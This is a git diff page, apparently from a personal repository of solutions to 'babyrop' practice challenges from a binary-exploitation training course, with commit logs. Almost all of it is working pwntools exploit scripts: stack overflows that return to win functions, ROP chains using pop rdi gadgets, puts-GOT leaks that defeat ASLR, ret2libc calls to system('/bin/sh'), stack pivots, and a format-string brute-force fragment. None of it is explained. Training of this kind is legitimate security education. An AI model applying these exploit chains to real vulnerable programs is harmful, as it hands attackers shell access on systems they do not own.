solve script

binary
oops
2025-08-06 20:16:12 +03:00 · 2025-08-06 20:16:04 +03:00 · 2025-08-06 20:05:50 +03:00 · 2025-08-06 20:05:30 +03:00 · 2025-08-06 19:59:17 +03:00 · 2025-08-06 19:59:08 +03:00
37 changed files with 636 additions and 1 deletions
@@ -10,7 +10,7 @@ libc = target.libc
 def brute():
 	for a in range(1, 256):
 		for b in range(8, 256, 16):
-			r = process()
+			r = process(level="error")
 			partial_ret = (a << 8) | b
 			write = (0x61 - (partial_ret & 0xff)) & 0xff
 			buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
@@ -0,0 +1,20 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_1_0
+"""
+
+context.binary = target = ELF("./babyrop_level_1_0", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*120
+buf += p64(target.sym.win)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,16 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_1_1", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*136
+buf += p64(target.sym.win)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,21 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_2_0
+"""
+
+context.binary = target = ELF("./babyrop_level_2_0", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*104
+buf += p64(target.sym.win_stage_1)
+buf += p64(target.sym.win_stage_2)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,17 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_2_1", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*88
+buf += p64(target.sym.win_stage_1)
+buf += p64(target.sym.win_stage_2)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,32 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_3_0
+"""
+
+context.binary = target = ELF("./babyrop_level_3_0", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = lambda a: p64(0x402c63) + p64(a)
+
+# buf
+buf = b"A"*72
+buf += pop_rdi(1)
+buf += p64(target.sym.win_stage_1)
+buf += pop_rdi(2)
+buf += p64(target.sym.win_stage_2)
+buf += pop_rdi(3)
+buf += p64(target.sym.win_stage_3)
+buf += pop_rdi(4)
+buf += p64(target.sym.win_stage_4)
+buf += pop_rdi(5)
+buf += p64(target.sym.win_stage_5)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,29 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_3_1", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+ss = lambda a: r.sendlineafter(b": ", a)
+
+# funcs
+pop_rdi = lambda a: p64(0x401e03) + p64(a)
+
+# buf
+buf = b"A"*104
+buf += pop_rdi(1)
+buf += p64(target.sym.win_stage_1)
+buf += pop_rdi(2)
+buf += p64(target.sym.win_stage_2)
+buf += pop_rdi(3)
+buf += p64(target.sym.win_stage_3)
+buf += pop_rdi(4)
+buf += p64(target.sym.win_stage_4)
+buf += pop_rdi(5)
+buf += p64(target.sym.win_stage_5)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,44 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_4_0
+"""
+
+context.binary = target = ELF("./babyrop_level_4_0", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x401a26
+
+# buf
+buf = b"A"*72
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.challenge)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = b"A"*72
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,40 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_4_1", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x401d4e
+
+# buf
+buf = b"A"*56
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.challenge)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = b"A"*56
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,44 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_5_0
+"""
+
+context.binary = target = ELF("./babyrop_level_5_0", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x401c60
+
+# buf
+buf = b"A"*88
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.challenge)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = b"A"*88
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,40 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_5_1", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x40187e
+
+# buf
+buf = b"A"*136
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.challenge)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = b"A"*136
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,44 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_6_0
+"""
+
+context.binary = target = ELF("./babyrop_level_6_0", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x4023cc
+
+# buf
+buf = b"A"*88
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.challenge)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = b"A"*88
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,40 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_6_1", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x4014e4
+
+# buf
+buf = b"A"*72
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.challenge)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = b"A"*72
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,36 @@
+#!/usr/bin/python3
+
+from pwn import *
+import re
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_7_0
+"""
+
+context.binary = target = ELF("./babyrop_level_7_0", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x402883
+
+# buf
+r.recvuntil(b"[LEAK]")
+system = int(re.findall(r'0x[a-z0-9]+', r.recvlineS())[0], 16)
+log.info("system: %#x", system)
+libc.address = system - libc.sym.system
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+
+# pop
+buf = b"A"*88
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,32 @@
+#!/usr/bin/python3
+
+from pwn import *
+import re
+
+context.binary = target = ELF("./babyrop_level_7_1", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x401ec3
+
+# buf
+r.recvuntil(b"[LEAK]")
+system = int(re.findall(r'0x[a-z0-9]+', r.recvlineS())[0], 16)
+log.info("system: %#x", system)
+libc.address = system - libc.sym.system
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+
+# pop
+buf = b"A"*104
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,44 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_8_0
+"""
+
+context.binary = target = ELF("./babyrop_level_8_0", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x4020a3
+
+# buf
+buf = b"A"*40
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.challenge)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = b"A"*40
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,40 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_8_1", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x401f63
+
+# buf
+buf = b"A"*104
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.challenge)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = b"A"*104
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,50 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_9_0
+"""
+
+context.binary = target = ELF("./babyrop_level_9_0", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rbp = 0x40129d
+leave_ret = 0x4016ab
+pop_rdi = 0x4027d3
+
+# buf
+buf = p64(pop_rbp)
+buf += p64(0x4150e0+0x10)
+buf += p64(leave_ret)
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym._start)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = p64(pop_rbp)
+buf += p64(0x4150e0+0x10)
+buf += p64(leave_ret)
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
@@ -0,0 +1,46 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_9_1", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rbp = 0x4011bd
+leave_ret = 0x4021f1
+pop_rdi = 0x402313
+
+# buf
+buf = p64(pop_rbp)
+buf += p64(0x415080+0x10)
+buf += p64(leave_ret)
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym._start)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = p64(pop_rbp)
+buf += p64(0x415080+0x10)
+buf += p64(leave_ret)
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
Author	SHA1	Message	Date
jc	6402b4e2a9	solve script	2025-08-06 20:16:12 +03:00
jc	e5e052ef8b	binary	2025-08-06 20:16:04 +03:00
jc	48d9b4ecb1	oops	2025-08-06 20:05:50 +03:00
jc	7779d922cf	oops	2025-08-06 20:05:30 +03:00
jc	8a12eae871	solve script	2025-08-06 19:59:17 +03:00
jc	d8f2ba18d8	binary	2025-08-06 19:59:08 +03:00
jc	96683cf9ce	solve script	2025-08-06 19:20:33 +03:00
jc	e582d2536a	binary	2025-08-06 19:20:22 +03:00
jc	efa1c23dbb	solve script	2025-08-06 19:18:02 +03:00
jc	15003e5606	binary	2025-08-06 19:17:53 +03:00
jc	7722ca5a21	solve script	2025-08-06 19:13:20 +03:00
jc	e29ebfb654	binary	2025-08-06 19:13:10 +03:00
jc	01d5e47459	solve script	2025-08-06 19:10:38 +03:00
jc	f1b113f802	binary	2025-08-06 19:10:28 +03:00
jc	3d11a08530	cleaner	2025-08-06 16:40:56 +03:00
jc	22df1755c0	solve script	2025-08-06 16:10:59 +03:00
jc	18a146b1a5	binary	2025-08-06 16:10:47 +03:00
jc	5e0b579bfc	solve script	2025-08-06 16:08:46 +03:00
jc	16e21c1763	binary	2025-08-06 16:08:35 +03:00
jc	5a5b449511	solve script	2025-08-06 15:44:25 +03:00
jc	2dd6d163af	binary	2025-08-06 15:44:16 +03:00
jc	9a2edba20d	solve script	2025-08-06 15:41:18 +03:00
jc	476fe82faf	binary	2025-08-06 15:38:12 +03:00
jc	828a4eca97	solve script	2025-08-06 15:35:19 +03:00
jc	72f01e0427	binary	2025-08-06 15:35:10 +03:00
jc	c0b1f1e2d3	solve script	2025-08-06 15:30:40 +03:00
jc	831408aedf	binary	2025-08-06 15:30:30 +03:00
jc	6dca4f2970	solve script	2025-08-06 15:19:24 +03:00
jc	c01f22eab5	binary	2025-08-06 15:19:14 +03:00
jc	d047d4a1ef	solve script	2025-08-06 15:15:18 +03:00
jc	baab6f675e	binary	2025-08-06 15:15:07 +03:00
jc	72e17002f9	oops	2025-08-05 18:24:54 +03:00
jc	d087cb7430	solve script	2025-08-05 18:19:59 +03:00
jc	ec2cdb7b35	binary	2025-08-05 18:19:49 +03:00
jc	4af1604d90	solve script	2025-08-05 18:18:16 +03:00
jc	c675b28f26	binary	2025-08-05 18:18:01 +03:00
jc	153fd786b8	solve script	2025-08-05 18:16:27 +03:00
jc	40c7bc25ee	binary	2025-08-05 18:16:16 +03:00
jc	4a2179ad71	solve script	2025-08-05 18:14:39 +03:00
jc	dbb004526e	binary	2025-08-05 18:14:29 +03:00